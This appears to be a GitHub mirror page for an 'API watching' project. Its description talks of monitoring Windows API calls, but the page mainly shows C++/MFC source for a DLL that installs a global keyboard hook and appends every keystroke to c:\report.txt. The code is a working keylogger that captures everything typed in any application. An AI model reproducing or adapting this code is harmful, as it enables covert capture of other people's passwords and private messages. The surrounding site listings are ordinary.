chenchen-hrbust / api_watching Goto Github PK
View Code? Open in Web Editor NEW监视Windows系统下程序执行过程中的API调用,采用Ring3 Hook方式进行监控,记录API调用,分析软件行为。
Home Page: git://github.com/huotianyi/API_watching.git
api_watching's Introduction
// hookKB.h : main header file for the HOOKKB DLL
//
#if !defined(AFX_HOOKKB_H__1689D17C_017F_4315_822F_8E9460F5ABB3__INCLUDED_)
#define AFX_HOOKKB_H__1689D17C_017F_4315_822F_8E9460F5ABB3__INCLUDED_
#if _MSC_VER > 1000
#pragma once
#endif // _MSC_VER > 1000
#ifndef __AFXWIN_H__
#error include 'stdafx.h' before including this file for PCH
#endif
#include "resource.h" // main symbols
/////////////////////////////////////////////////////////////////////////////
// CHookKBApp
// See hookKB.cpp for the implementation of this class
//
class CHookKBApp : public CWinApp
{
public:
CHookKBApp();
LRESULT __declspec(dllexport)__stdcall CALLBACK KeyboardProc(int nCode,WPARAM wParam,LPARAM lParam);
BOOL __declspec(dllexport)__stdcall installhook();
// BOOL __declspec(dllexport) UnHook();
// Overrides
// ClassWizard generated virtual function overrides
//{{AFX_VIRTUAL(CHookKBApp)
public:
virtual BOOL InitInstance();
virtual int ExitInstance();
//}}AFX_VIRTUAL
//{{AFX_MSG(CHookKBApp)
// NOTE - the ClassWizard will add and remove member functions here.
// DO NOT EDIT what you see in these blocks of generated code !
//}}AFX_MSG
DECLARE_MESSAGE_MAP()
};
/////////////////////////////////////////////////////////////////////////////
//{{AFX_INSERT_LOCATION}}
// Microsoft Visual C++ will insert additional declarations immediately before the previous line.
#endif // !defined(AFX_HOOKKB_H__1689D17C_017F_4315_822F_8E9460F5ABB3__INCLUDED_)
// hookKB.cpp : Defines the initialization routines for the DLL.
//
#include "stdafx.h"
#include "hookKB.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
//
// Note!
//
// If this DLL is dynamically linked against the MFC
// DLLs, any functions exported from this DLL which
// call into MFC must have the AFX_MANAGE_STATE macro
// added at the very beginning of the function.
//
// For example:
//
// extern "C" BOOL PASCAL EXPORT ExportedFunction()
// {
// AFX_MANAGE_STATE(AfxGetStaticModuleState());
// // normal function body here
// }
//
// It is very important that this macro appear in each
// function, prior to any calls into MFC. This means that
// it must appear as the first statement within the
// function, even before any object variable declarations
// as their constructors may generate calls into the MFC
// DLL.
//
// Please see MFC Technical Notes 33 and 58 for additional
// details.
//
/////////////////////////////////////////////////////////////////////////////
// CHookKBApp
#pragma data_seg(".SHARDAT")
static HHOOK hkb=NULL;
FILE *f1;
#pragma data_seg()
HINSTANCE hins;
BEGIN_MESSAGE_MAP(CHookKBApp, CWinApp)
//{{AFX_MSG_MAP(CHookKBApp)
// NOTE - the ClassWizard will add and remove mapping macros here.
// DO NOT EDIT what you see in these blocks of generated code!
//}}AFX_MSG_MAP
END_MESSAGE_MAP()
/////////////////////////////////////////////////////////////////////////////
// CHookKBApp construction
CHookKBApp::CHookKBApp()
{
// TODO: add construction code here,
// Place all significant initialization in InitInstance
}
/////////////////////////////////////////////////////////////////////////////
// The one and only CHookKBApp object
CHookKBApp theApp;
LRESULT __declspec(dllexport)__stdcall CALLBACK KeyboardProc(int nCode,WPARAM wParam,LPARAM lParam)
{
char ch;
if((wParam==VK_SPACE) ||(wParam==VK_RETURN) ||(wParam>=0x2f) &&(wParam<=0x100))
{
f1=fopen("c:\\report.txt","a+");
if(wParam==VK_RETURN)
{
ch='\n';
fwrite(&ch,1,1,f1);
}
else
{
BYTE ks[256];
GetKeyboardState(ks);
WORD w;
UINT scan;
scan=0;
ToAscii(wParam,scan,ks,&w,0);
ch=char(w);
fwrite(&ch,1,1,f1);
}
fclose(f1);
}
//将键盘消息传递给其他钩子链上的程序
LRESULT RetVal=CallNextHookEx(hkb,nCode,wParam,lParam);
return RetVal;
}
//安装键盘钩子
BOOL __declspec(dllexport)__stdcall installhook()
{
f1=fopen("c:\\report.txt","w");
fclose(f1);
hkb=SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)KeyboardProc,hins,0);
return TRUE;
}
//卸载键盘钩子
BOOL __declspec(dllexport) UnHook()
{
BOOL unhooked=UnhookWindowsHookEx(hkb);
return unhooked;
}
BOOL CHookKBApp::InitInstance()
{
// TODO: Add your specialized code here and/or call the base class
AFX_MANAGE_STATE(AfxGetStaticModuleState());
hins=AfxGetInstanceHandle();
return CWinApp::InitInstance();
}
int CHookKBApp::ExitInstance()
{
// TODO: Add your specialized code here and/or call the base class
UnHook(); //卸载键盘钩子
return CWinApp::ExitInstance();
}
api_watching's People
Contributors
Stargazers
Watchers
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.